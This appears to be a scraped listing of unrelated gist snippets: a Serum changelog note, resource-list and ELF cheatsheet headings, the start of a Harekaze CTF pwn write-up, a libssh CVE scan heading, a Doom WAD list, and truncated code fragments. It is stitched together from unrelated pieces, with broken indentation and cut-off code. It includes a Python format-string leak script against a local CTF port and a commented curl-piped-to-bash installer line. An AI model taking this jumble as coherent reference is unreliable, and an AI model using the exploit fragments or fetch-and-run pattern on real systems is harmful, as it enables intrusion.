hed0rah jrelo

Xfer Records - Serum - Changelog / Release Notes

Note: This was originally extracted from the HTML returned from the https://xferrecords.com/api/update_check/serum API, converted to markdown, and then the formatted manually cleaned up a bit further. It probably won't be kept strictly up to date, but it should at least serve as a useful historical record.

Note: For releases that I had access to the *.exe/*.dmg files for, I have also included the SHA256 hashes of the official downloads; so that they can be used to verify the authenticity of any versions that you might come across. At time of writing, the first version below that includes the hashes is 1.36b8 (October 11 2023)

Ultimate Resource List

CLI Tools
GUI Tools
Web Tools
Systems/Services
Networks
Containers/Orchestration
Manuals/Howtos/Tutorials

ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.

Compilation

I played Harekaze Mini CTF 2020 for about 3 hours this weekend. The pwn challenges were nice (I especially enjoyed nm-game-extreme). Here are some short writeups.

shellcode

The program just tells you to provide shellcode that will execute execve("/bin/sh", NULL, NULL). It gives you the address of the "/bin/sh" string, so you just create shellcode to do the job and send it:

#!/usr/bin/env python3

from pwn import *

Libssh authentication bypass vulnerability (CVE-2018-10933)

An analysis of Censys Public Scan 20180807 (only port 22) to estimate the number of servers {potentially} vulnerable to the recent Libssh bug.

Doom WAD List

Official

IWADs

The Ultimate Doom
Doom II
Final Doom - The Plutonia Experiment
Final Doom - TNT: Evilution

	###########################################################
	## https://www.reddit.com/r/cybersecurity/comments/iu17uu/cybersec_cheat_sheets_in_all_flavors_huge_list/
	###########################################################

	Posted byu/HeyGuyGuyGuy
	12 days ago
	Cybersec Cheat Sheets in all Flavors! (Huge List Inside)
	"UGH! Whats the command to [insert function here]?"

	###########################################################

	import struct
	import socket

	s = socket.socket()
	s.connect(('127.0.0.1', 1337))
	r = s.recv(1024)
	s.send("%p,%p,%p\n")
	while ',' not in r:
	r = s.recv(1024)
	start_buf = int(r.split(',')[1], 16)-9

	function walk(node) {
	// I stole this function from here:
	// http://is.gd/mwZp7E

	var child, next;

	var tagName = node.tagName ? node.tagName.toLowerCase() : "";
	if (tagName == 'input' \|\| tagName == 'textarea') {
	return;
	}

	#!/bin/bash

	# this tool will automate firmware extraction and unpacking using FT232R-type adaptors (like BusPirate) and a SOIC clip placed on a chip to dump
	# install the necessary software:
	#$ sudo apt install flashrom binwalk \|\| echo 'git clone?'
	# pump up binwalk with additional packages and libraries
	#$ bash <(curl -s https://raw.githubusercontent.com/devttys0/binwalk/master/deps.sh)
	# place the clip on the chip, connect it to the adaptor, which sould be connected to your PC (with drivers installed) and launch the script:
	# chip => clip => adaptor => PC => script